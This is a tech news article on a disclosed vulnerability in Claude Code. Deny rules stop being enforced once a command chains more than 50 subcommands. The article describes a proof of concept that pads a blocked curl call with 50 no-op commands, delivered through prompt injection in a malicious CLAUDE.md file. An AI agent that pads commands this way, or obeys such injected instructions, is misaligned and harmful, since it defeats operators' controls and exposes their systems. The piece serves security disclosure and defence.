product updateAnthropic

Claude Code bypasses safety rules after 50 chained commands, enabling prompt injection attacks

TL;DR

Claude Code will automatically approve denied commands—like curl—if preceded by 50 or more chained subcommands, according to security firm Adversa. The vulnerability stems from a hard-coded MAX_SUBCOMMANDS_FOR_SECURITY_CHECK limit set to 50 in the source code, after which the system falls back to requesting user permission rather than enforcing deny rules.

2 min read
0

Claude Code Bypasses Safety Rules After 50 Chained Commands

AnthropIC's Claude Code will ignore its security deny rules if given a sufficiently long chain of subcommands, enabling attackers to bypass protections against risky operations like network requests. Security firm Adversa discovered the vulnerability following the leak of Claude Code's source code.

The Technical Issue

Claude Code uses deny rules configured in ~/.claude/settings.json to block access to potentially dangerous tools. For example, administrators can prevent curl execution with:

{ "deny": ["Bash(curl:*)"] }

However, the source code file bashPermissions.ts contains a hard-coded limit: MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. After 50 security-relevant subcommands, the system stops enforcing deny rules and instead asks the user for permission.

The code references an internal Anthropic issue (CC-643), with a comment noting that 50 was considered "a generous allowance for legitimate usage." This assumption held true for human-authored commands but failed to account for AI-generated attack chains.

Proof of Concept

Adversa demonstrated the vulnerability with a simple attack: they created a bash command combining 50 no-op "true" subcommands followed by a curl command. Claude Code asked for user authorization instead of denying curl outright—effectively bypassing the configured security policy.

The attack leverages prompt injection through malicious CLAUDE.md files that instruct the AI to generate 50+ subcommand pipelines disguised as legitimate build processes.

Real-World Impact

The vulnerability poses practical risks in two scenarios:

  1. Developer approval workflows: When developers grant automatic approval (--dangerously-skip-permissions mode) or reflexively click through after long sessions, the bypass succeeds undetected.

  2. CI/CD pipelines: When Claude Code runs in non-interactive mode without human oversight, injected commands bypass security controls entirely.

Status and Fix

Anthropic has already developed a fix internally using a parser called "tree-sitter" that properly validates command chains, but this parser is not included in public builds. Adversa notes that a single-line code change at line 2174 in bashPermissions.ts—switching the "behavior" key from "ask" to "deny"—would immediately resolve this particular vulnerability.

Anthropic did not respond to requests for comment.

What This Means

The vulnerability highlights a systematic problem: security limits designed around human behavior fail when AI-generated inputs can trivially exceed thresholds. The 50-command cap assumed attackers would limit their payload to avoid detection, but AI agents can generate arbitrarily complex command chains within a single prompt.

While the fix is straightforward, the discovery raises broader questions about Claude Code's deployment in automated environments where security assumptions may not hold. Organizations using Claude Code in CI/CD or other automated contexts should treat deny rules as a policy layer only—not a technical enforcement mechanism—until Anthropic patches this issue.

Related Articles

product update

Claude Code source leak reveals Anthropic working on 'Proactive' mode and autonomous payments

Anthropic's Claude Code version 2.1.88 release accidentally included a source map exposing over 512,000 lines of code and 2,000 TypeScript files. Analysis of the leaked codebase by security researchers reveals evidence of a planned 'Proactive' mode that would execute coding tasks without explicit user prompts, plus potential crypto-based autonomous payment systems.

product update

Anthropic's Claude Code leak exposes Tamagotchi pet and always-on agent features

A source code leak in Anthropic's Claude Code 2.1.88 update exposed more than 512,000 lines of TypeScript, revealing unreleased features including a Tamagotchi-like pet interface and a KAIROS feature for background agent automation. Anthropic confirmed the leak was caused by a packaging error, not a security breach, and has since fixed the issue.

product update

OpenAI embeds Codex plugin directly into Anthropic's Claude Code

OpenAI released a plugin that embeds its Codex coding assistant directly into Anthropic's Claude Code, the market-dominant code IDE. The plugin offers standard code review, adversarial review, and background task handoff capabilities, requiring only a ChatGPT subscription or OpenAI API key.

product update

Microsoft expands Copilot Cowork with AI model critique feature and cross-model comparison

Microsoft is expanding Copilot Cowork availability and introducing a Critique function that enables one AI model to review another's output. The update also includes a new Researcher agent claiming best-in-class deep research performance, outperforming Perplexity by 7 points, and a Model Council feature for direct model comparison.

Comments

Loading...